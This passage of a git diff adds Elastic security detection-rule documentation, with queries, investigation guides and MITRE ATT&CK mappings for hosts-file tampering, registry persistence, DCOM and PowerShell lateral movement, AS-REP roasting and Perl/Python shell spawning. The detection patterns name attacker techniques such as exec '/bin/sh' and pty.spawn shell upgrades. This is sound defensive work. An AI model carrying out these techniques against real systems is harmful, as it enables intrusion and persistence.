markdown] +---------------------------------- +## Triage and analysis + +### Investigating High Number of Process Terminations + +Attackers can kill processes for a variety of purposes. For example, they can kill process associated with business applications and databases to release the lock on files used by these applications so they may be encrypted,or stop security and backup solutions, etc. + +This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. + +#### Possible investigation steps + +- Examine the entry point to the host and user in action via the Analyse View. + - Identify the session entry leader and session user. +- Examine the contents of session leading to the process termination(s) via the Session View. + - Examine the command execution pattern in the session, which may lead to suspricous activities. +- Examine the process killed during the malicious execution + - Identify imment threat to the system from the process killed. + - Take necessary incident response actions to respawn necessary process. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Reimage the host operating system or restore it to the operational state. +- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and process.name:"pkill" and process.args:"-f" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hosts-file-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hosts-file-modified.asciidoc new file mode 100644 index 0000000000..488a4c6145 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hosts-file-modified.asciidoc @@ -0,0 +1,125 @@ +[[prebuilt-rule-8-10-5-hosts-file-modified]] +=== Hosts File Modified + +The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-reference-yml.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Hosts File Modified + +Operating systems use the hosts file to map a connection between an IP address and domain names before going to domain name servers. Attackers can abuse this mechanism to route traffic to malicious infrastructure or disrupt security that depends on server communications. For example, Russian threat actors modified this file on a domain controller to redirect Duo MFA calls to localhost instead of the Duo server, which prevented the MFA service from contacting its server to validate MFA login. This effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to "Fail open" if the MFA server is unreachable. This can happen in any MFA implementation and is not exclusive to Duo. Find more details in this [CISA Alert](https://www.cisa.gov/uscert/ncas/alerts/aa22-074a). + +This rule identifies modifications in the hosts file across multiple operating systems using process creation events for Linux and file events in Windows and macOS. + +#### Possible investigation steps + +- Identify the specifics of the involved assets, such as role, criticality, and associated users. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the changes to the hosts file by comparing it against file backups, volume shadow copies, and other restoration mechanisms. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and the configuration was justified. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Review the privileges of the administrator account that performed the action. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where + + /* file events for creation; file change events are not captured by some of the included sources for linux and so may + miss this, which is the purpose of the process + command line args logic below */ + ( + event.category == "file" and event.type in ("change", "creation") and + file.path : ("/private/etc/hosts", "/etc/hosts", "?:\\Windows\\System32\\drivers\\etc\\hosts") and + not process.name in ("dockerd", "rootlesskit", "podman", "crio") + ) + or + + /* process events for change targeting linux only */ + ( + event.category == "process" and event.type in ("start") and + process.name in ("nano", "vim", "vi", "emacs", "echo", "sed") and + process.args : ("/etc/hosts") and + not process.parent.name in ("dhclient-script", "google_set_hostname") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Manipulation +** ID: T1565 +** Reference URL: https://attack.mitre.org/techniques/T1565/ +* Sub-technique: +** Name: Stored Data Manipulation +** ID: T1565.001 +** Reference URL: https://attack.mitre.org/techniques/T1565/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hping-process-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hping-process-activity.asciidoc new file mode 100644 index 0000000000..62ccfa6766 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hping-process-activity.asciidoc @@ -0,0 +1,65 @@ +[[prebuilt-rule-8-10-5-hping-process-activity]] +=== Hping Process Activity + +Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://en.wikipedia.org/wiki/Hping + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" +and process.name in ("hping", "hping2", "hping3") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Information Discovery +** ID: T1082 +** Reference URL: https://attack.mitre.org/techniques/T1082/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc new file mode 100644 index 0000000000..e5901dafba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc @@ -0,0 +1,88 @@ +[[prebuilt-rule-8-10-5-image-file-execution-options-injection]] +=== Image File Execution Options Injection + +The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and length(registry.data.strings) > 0 and + registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*.exe\\Debugger", + "HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*\\Debugger", + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess", + "HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*.exe\\Debugger", + "\\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*\\Debugger", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess", + "\\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess" + ) and + /* add FPs here */ + not registry.data.strings regex~ ("""C:\\Program Files( \(x86\))?\\ThinKiosk\\thinkiosk\.exe""", """.*\\PSAppDeployToolkit\\.*""") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc new file mode 100644 index 0000000000..3283d34f40 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc @@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node]] +=== Inbound Connection to an Unsecure Elasticsearch Node + +Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), and/or lack authentication, and are accepting inbound network connections over the default Elasticsearch port. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* logs-network_traffic.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-security.html +* https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-http-options.html#_send_all_headers + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Initial Access +* Domain: Endpoint + +*Version*: 104 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +(event.dataset: network_traffic.http OR (event.category: network_traffic AND network.protocol: http)) AND + status:OK AND destination.port:9200 AND network.direction:inbound AND NOT http.response.headers.content-type:"image/x-icon" AND NOT + _exists_:http.request.headers.authorization + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc new file mode 100644 index 0000000000..98fb5db33b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc @@ -0,0 +1,86 @@ +[[prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc]] +=== Incoming DCOM Lateral Movement with MMC + +Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1m + [network where host.os.type == "windows" and event.type == "start" and process.name : "mmc.exe" and source.port >= 49152 and + destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1" and + network.direction : ("incoming", "ingress") and network.transport == "tcp" + ] by process.entity_id + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "mmc.exe" + ] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Distributed Component Object Model +** ID: T1021.003 +** Reference URL: https://attack.mitre.org/techniques/T1021/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc new file mode 100644 index 0000000000..20aceef39e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc @@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting]] +=== Incoming Execution via PowerShell Remoting + +Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan = 30s + [network where host.os.type == "windows" and network.direction : ("incoming", "ingress") and destination.port in (5985, 5986) and + network.protocol == "http" and source.ip != "127.0.0.1" and source.ip != "::1"] + [process where host.os.type == "windows" and + event.type == "start" and process.parent.name : "wsmprovhost.exe" and not process.executable : "?:\\Windows\\System32\\conhost.exe"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Windows Remote Management +** ID: T1021.006 +** Reference URL: https://attack.mitre.org/techniques/T1021/006/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc new file mode 100644 index 0000000000..b8a1c0de96 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc @@ -0,0 +1,91 @@ +[[prebuilt-rule-8-10-5-installation-of-security-support-provider]] +=== Installation of Security Support Provider + +Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\Security Packages*", + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\OSConfig\\Security Packages*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Lsa\\Security Packages*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Lsa\\OSConfig\\Security Packages*" + ) and + not process.executable : ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Security Support Provider +** ID: T1547.005 +** Reference URL: https://attack.mitre.org/techniques/T1547/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc new file mode 100644 index 0000000000..e4282bd01d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc @@ -0,0 +1,63 @@ +[[prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl]] +=== Interactive Terminal Spawned via Perl + +Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:perl and + process.args:("exec \"/bin/sh\";" or "exec \"/bin/dash\";" or "exec \"/bin/bash\";") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc new file mode 100644 index 0000000000..b583da5300 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc @@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python]] +=== Interactive Terminal Spawned via Python + +Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +( + (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", + "fish") and process.parent.args_count >= 3 and process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or + (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", + "fish") and process.args : "*sh" and process.args_count == 1 and process.parent.args_count == 1) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Python +** ID: T1059.006 +** Reference URL: https://attack.mitre.org/techniques/T1059/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc new file mode 100644 index 0000000000..9da4a58931 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user]] +=== Kerberos Pre-authentication Disabled for User + +Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://harmj0y.medium.com/roasting-as-reps-e6179a65216b +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 +* https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring +* Data Source: Active Directory + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Kerberos Pre-authentication Disabled for User + +Kerberos pre-authentication is an account protection against offline password cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password. Microsoft's security monitoring [recommendations](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) state that `'Don't Require Preauth' – Enabled` should not be enabled for user accounts because it weakens security for the account’s Kerberos authentication. + +AS-REP roasting is an attack against Kerberos for user accounts that do not require pre-authentication, which means that if the target user has pre-authentication disabled, an attacker can request authentication data for it and get a TGT that can be brute-forced offline, similarly to Kerberoasting. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Determine if the target account is sensitive or privileged. +- Inspect the account activities for suspicious or abnormal behaviors in the alert timeframe. + +### False positive analysis + +- Disabling pre-authentication is a bad security practice and should not be allowed in the domain. The security team should map and monitor any potential benign true positives (B-TPs), especially if the target account is privileged. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Reset the target account's password if there is any risk of TGTs having been retrieved. +- Re-enable the preauthentication option or disable the target account. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.code:4738 and winlog.api:"wineventlog" and message:"'Don't Require Preauth' - Enabled" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal or Forge Kerberos Tickets +** ID: T1558 +** Reference URL: https://attack.mitre.org/techniques/T1558/ +* Sub-technique: +** Name: AS-REP Roasting +** ID: T1558.004 +** Reference URL: https://attack.mitre.org/techniques/T1558/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Tactic: +** 